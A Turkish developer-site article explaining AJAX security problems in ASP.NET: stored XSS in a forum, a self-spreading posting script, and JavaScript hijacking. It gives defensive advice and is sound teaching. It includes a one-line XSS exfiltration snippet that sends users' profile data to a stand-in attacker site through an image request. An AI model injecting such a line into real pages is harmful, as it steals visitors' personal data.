• Anasayfa
  • Hakkımızda
  • Etkinlikler
  • Destek Verin
  • Site Haritası
  • Giriş Yap
  • Üye Ol
  • Facebook
  • Twitter
  • RSS
Yazılım Dilleri
  • Soru - Cevap
  • EĞİTİM SETİ
  • KATEGORİ
  • DUYURU
  • TEKNOLOJİ HABERLERİ

Son Sorular

  • 8/2/2020 11:38:31 PM'Basit' Yazılım Dili
  • 6/25/2020 3:18:13 PMderleme hatası
  • 12/11/2017 4:49:15 PMWindows Hizmeti Hk.
  • 4/23/2016 12:55:33 AMC programlama 2 oyun

Popüler Sorular

  • 5/27/2012 5:49:50 AMAsp.Net ile Date time alana veri ekleyemiiyorum ?
  • 4/2/2012 12:45:18 AM.exe uzantılı dosya için dijital imza nerde nasıl alınır.
  • 5/12/2012 8:44:49 AMAcil Yardım
  • 5/27/2012 1:46:51 PMveri tabanı bağlantısı
  • .Net Framework
  • 8085 Assembly
  • Active Directory
  • ADO.NET
  • Android
  • Apple IOS
  • Arduino
  • ASP.NET
  • ASP.NET MVC
  • Blackberry
  • C#.Net
  • C++
  • CCG Framework
  • CISCO
  • CSS
  • Diğer
  • Dreamweaver
  • Entity Framework
  • Exchange Server
  • Gömülü Sistemler
  • GSM Programlama
  • Güncel
  • Güvenlik
  • HTML5
  • Java
  • Javascript / JQuery
  • Jira
  • Kariyer ve İş Yaşamı
  • LibreOffice
  • LINQ
  • Linux
  • Matlab
  • Microsoft Dynamics CRM
  • Mobil Uygulama Geliştirme
  • MySQL
  • NoSQL
  • Oracle
  • OWIN
  • PFSense
  • PHP
  • Powershell
  • Python
  • Sanallastirma
  • SAP-ABAP
  • SCOM 2012
  • SEO
  • Sharepoint 2010
  • Sharepoint 2013
  • Silverlight
  • Sistem Analiz ve Tasarımı
  • SQL Server
  • Symantec
  • TFS
  • T-SQL
  • Ubuntu
  • VB.NET
  • Veritabanı Yönetim Sistemleri
  • Visual Studio
  • VMware
  • WCF
  • Web Hosting
  • Windows 8
  • Windows Azure
  • Windows Phone 7.1
  • Windows Phone 8
  • Windows Server
  • Wordpress
  • WPF
  • Xamarin
  • XNA
  • Yazılım Mühendisliği
  • Yöneylem Araştırması
  • ASP.NET MVC
  • Entity Framework
  • Javascript / JQuery
  • LINQ
  • PHP

Son Duyurular

IPhone 6 ve IPhone 6 Plus Teknik Özellikleri ve Fiyatı

IPhone 6 ve IPhone 6 Plus Teknik Özellikleri ve Fiyatı

DELL'in Yeni Projesi: USB Bilgisayar (Project Ophelia)

DELL'in Yeni Projesi: USB Bilgisayar (Project Ophelia)

Windows Phone Youtube Uygulaması Google ve Microsoft ile Yeniden Yapılıyor

Windows Phone Youtube Uygulaması Google ve Microsoft ile Yeniden Yapılıyor

Android ve Apple IOS Telefonlar için Blackberry Messenger (BBM)

Android ve Apple IOS Telefonlar için Blackberry Messenger (BBM)

Nokia Lumia 925 Teknik Özellikleri, Lumia 928 ve 920 ile Karşılaştırması

Nokia Lumia 925 Teknik Özellikleri, Lumia 928 ve 920 ile Karşılaştırması

LG Optimus G Pro Özellikleri ve Gözle Video Oynatma Teknolojisi

LG Optimus G Pro Özellikleri ve Gözle Video Oynatma Teknolojisi

AJAX ve Güvenlik Sorunları

AJAX ve Güvenlik Sorunları

10.03.2010

Yazar: Daron Yöndem (Google+)

Kategori: ASP.NET

5425

AJAX artık neredeyse her web projesinde kullanılır oldu. Bazı projelerde ufak noktalarda kendini gösteren AJAX yeni nesil projelerde ise neredeyse tüm iş katmanına yayılmış durumda. Bu noktada maalesef AJAX'ın getirdiği heyecanın kısmi sersemliği ile güvenlik konusunda kaygılar unutulmuş durumda. Oysa eskiden beridir XSS (Cross-Site-Scripting) bizim JavaScript tarafındaki en önemli düşmanlarımızdan. Ne kadar ilginçtir ki AJAX'ın göbeğinde de JavaScript bulunuyor.

XSS yeni bir güvenlik sorunu değil ki!?

Kesinlikle değil. Cross-Site-Scripting uzun süredir bilinen, tanınan ve koruma yöntemleri geliştirilmiş bir sorun. Fakat XSS'in yaratacağı sorunlar AJAX ile binlerce kat büyüyor. Nasıl mı oluyor? Hemen bir örnek üzerinden gidelim. Varsayalım bir forum uygulaması programlıyorsunuz ve kullanıcıların attıkları mesajların içeriğini kontrol etmiyorsunuz. Ziyaretçilerden biri mesajının arasına kendi hazırlamış olduğu JavaScript kodunu yerleştirdi ve mesajı yolladı. Mesajı direk sitede gösterdiğinizi varsayalım (Kötü bir programcısınız :)). Söz konusu kullanıcının gönderdiği JavaScript kodu tüm kullanıcıların bilgisayarında çalışacaktır. Bu noktada basit bir saldırı tipi olarak uygun JavaScript kodu ile o sayfaya giren tüm kullanıcıların başka bir adrese yönlendirilmesinden bahsedebiliriz (fishing). Forumunuzda mesajların gönderimi ve gösterimi için AJAX kullandığınızı varsayalım. Kullandığınız AJAX kodu, yani JavaScript kodunuz tüm kullanıcılara gidiyor ve kaynak içerisinde incelenebiliyor. Biraz önce bahsettiğimiz "kötü ziyaretçi" sizin AJAX metodlarınızı kullanarak forumunuza mesaj atan bir JavaScript fonksiyonu yazarak mesajına eklerse neler olur? Mesajın gözüktüğü sayfayı açan herkes o JavaScript metodunu çalıştırmış olur böylece bir anda forumunuzdaki her kullanıcının yüzlerce mesaj atması gibi bir durumla karşılaşabilirsiniz. Tüm bu işlem AJAX tarafında yapıldığı için de kimse farkına varmayacaktır.

Aynı forum uygulamamızla ilgili başka bir durumdan bahsedelim. Forum uygulamasını programlarken kullanıcıların bilgilerini de değiştirebilecekleri bir sayfa hazırladınız. Tüm kullanıcıları bilgileri AJAX ile sayfaya yerleşiyor ve kaydedilebiliyor. Tabi ki tüm bu AJAX metodlarınız foruma mesaj atılan ve mesajların gösterildiği metodlar ile sayfada yer alıyor. Kötü kullanıcı Şerafettin :) sitenizde kullanıcıların bilgilerini profil sayfasına yerleştiren, yani veritabanından çeken AJAX metodlarını kullanan bir JavaScript komutu yazarak mesajına ekleyip gönderdi. Her kullanıcı forumda gezerken Şerafettin'in yazdığı kod söz konusu kullanıcının bilgileri alacak. Peki sonra ne yapacak? Bu bilgisi aşağıdaki gibi klasik bir teknikle kendi sitesine aktaracak :)

(new Image()).src = "http://serafettin.com/bilgigeldi.php?data=" + ProfilBilgisi;

Gözümüzün önünde tüm kullanıcıların profil bilgileri Şerafettin'in mesajının bulunduğu sayfaya girdikleri gibi elden gidiyor.

XSS'i engellemek, yani kullanıcıların web sitenize gönderdiği içeriği filtrelemek için Microsoft tarafından ASP.NET geliştiricileri için hazırlanmış olan Anti-Cross Site Script kütüphanesini kullanabilirsiniz.

JavaScript Hijacking

Bir diğer AJAX sorunlarıdan biri de sitemiz dahilindeki AJAX metodlarının başka sitelerde de kullanılabilmesi. Eğer AJAX metodlarınızı harici bir JavaScript dosyasına yerleştirerek sayfanıza linklediyseniz aynı linklemeyi başka siteler de yapabilir. Farklı alan adları arasında XMLHttpRequest objelerinin çalışmaması ile ilgili güvenlik düzenlemeleri olmasına karşın bu durumla ilgili herhangi bir düzenleme yapmak pek mümkün değil.

<script language="javascript" src="http://www.deneme.com/WebService.asmx/js"></script>

Yukarıdaki kodu kullanarak deneme.com sitesinde kullanılmak üzere hazırlanmış JavaScript metodlarını herhangi bir sitede, sayfada kullanabilirsiniz. Dikkat ederseniz özellikle örnek içerisinde ScriptService özelliğine sahip bir ASP.NET web servisi kullandım. Bizim genelde ASP.NET AJAX tarafında sayfamıza linklediğimiz harici AJAX metodları web servislerinde yer alıyor.

Peki bu güvenlik açığına karşı ne yapabiliriz? Herhangi birşey yapmanız gerekmiyor :) Microsoft bu açığı öngörmüş ve HTTP GET metodlarını web metodlarına kapatmış. Yukarıdaki kod kullanılarak yapılacak bir talep GET metodu ile yapılacaktır, herhangi bir şekilde POST metodu ile yapılması mümkün değil. Siz web methodlarınıza UseHttpGet:=True özelliği vermediğiniz sürece herhangi bir sorun olmayacaktır.

Sonuç

Benim tavsiyem AJAX kullanırken özellikle veri alımında, yani veritabanına kaydedilecek veriyi kullanıcıdan alırken kullandığınız tekniklerde dikkatli davranmanız. Eğer Forms Authentication kullanıyorsanız web servislerinizi de korumaya almanızda fayda var. Tüm bu tekniklerin haricinde sunucu taraflı sistem yükü fazla olsa da Session bazlı ID'ler tanımlayarak sayfanızdaki AJAX işlemlerine gerçek zamanlı parametre olarak ekleyerek gelen taleplerin sizin sisteminizden gelip gelmediğini de kontrol edebilirsiniz. Son olarak XSS'e karşı korunmayı da unutmayın.

Yazar Hakkında

Daron Yöndem

Daron Yöndem

daron.yondem.com

DEVELOAD Yazılım şirketi kurucusu Daron Yöndem ASP.NET alanında aldığı MVP ünvanını son üç yıldır Silverlight alanında devam ettirmektedir. Microsoft Regional Director ünvanına da sahip olan Daron Yöndem’e 2009, 2010 ve 2011 yıllarında Microsoft tarafından “Gold Global Impact Award” ödülü verilmiştir. Microsoft TechEd, PDC, DevReach, Microsoft DevDays gibi uluslararası konferanslarda konuşmacı olan Daron Yöndem INETA (International .NET Association) Orta-Doğu Afrika Bölge Başkanlığı görevini sürdürürerek 262.000’i aşkın üyesi olan 58 sosyal topluluğa destek vermektedir. Üç Türkçe, üç İngilizce kitabı olan Daron Yöndem’in Wrox Publishing gibi uluslararası yayınevlerinden kitapları bulunmaktadır.

Sosyal Medya

ORANLAR

  • 5425izleme

Arkadaşlarınla Paylaş

  • Tweet

0 Yorum

Yorum Yaz / Soru Sor

Lütfen yorum yazmak veya soru sormak için üye girişi yapınız.

Son Yorumlar

  • Böyle bir sayfalama ağ trafiğini hafifleti...
  • Böyle bir sayfalama ağ trafiğini hafifleti...
  • Merhaba, ellerinize sağlık çok yardımcı ol...
  • Merhaba Bu uygulama örneğinden ASP.net ...
  • Hocam Link başka sayfaya yönlendiriyor.

En Güncel Sorular

  • Bilgilendirme maili (C#.Net)
  • Power Pivot (Sharepoint 2010)
  • BigInteger, BigDecimal (Asp.Net ve Asp.Net MVC)
  • visual C# ile asp nette veritabanı islemleri (Asp.Net ve Asp.Net MVC)
  • Share Point ile Dosya Arşiv Yönetim Sistemi yapılabilir mi ? (Sharepoint 2010)

En Son Cevap Verilen Sorular

  • Bilgilendirme maili
  • BigInteger, BigDecimal
  • visual C# ile asp nette veritabanı islemleri
  • Share Point ile Dosya Arşiv Yönetim Sistemi yapılabilir mi ?
  • txt dosyasına veri yazma

Twitter

Takip et: @yazilim_dilleri

En Çok Okunanlar

Elif BAYRAKDAR

C# ile SQL Server Bağlantısı, Insert, Update ve Delete Sorguları

23.05.2013

  • 123823
  • 0
Hakan Keskin

C# ile Windows Service Projesi Oluşturma, Debug Etme ve Setup Hazırlama

17.12.2013

  • 70897
  • 0
batuhan avlayan

Php - Mail Gönderme (İletişim Formu)

02.09.2013

  • 51538
  • 0

Sponsorlar

KODLAB
Pluralsight
Exchange server is
Office 365
YAZILIM DİLLERİ
Yukarı Çık
  • Hakkımızda
  • Facebook
  • Twitter
  • RSS

© Yazılım Dillerinin Buluşma Noktası | Kaynak belirtildiği sürece makaleler kopyalanabilir.
YazilimDilleri.Net sitesinde yer alan kullanıcıların oluşturduğu tüm içeriklerin yayınlanması ile ilgili yasal yükümlülükler içeriği oluşturan kullanıcıya aittir, YazilimDilleri.Net hiçbir şekilde sorumlu değildir.

Kapat

Giriş Yap

Kullanıcı Adı

Şifre

Şifremi Unuttum

KULLANICI GİRİŞİ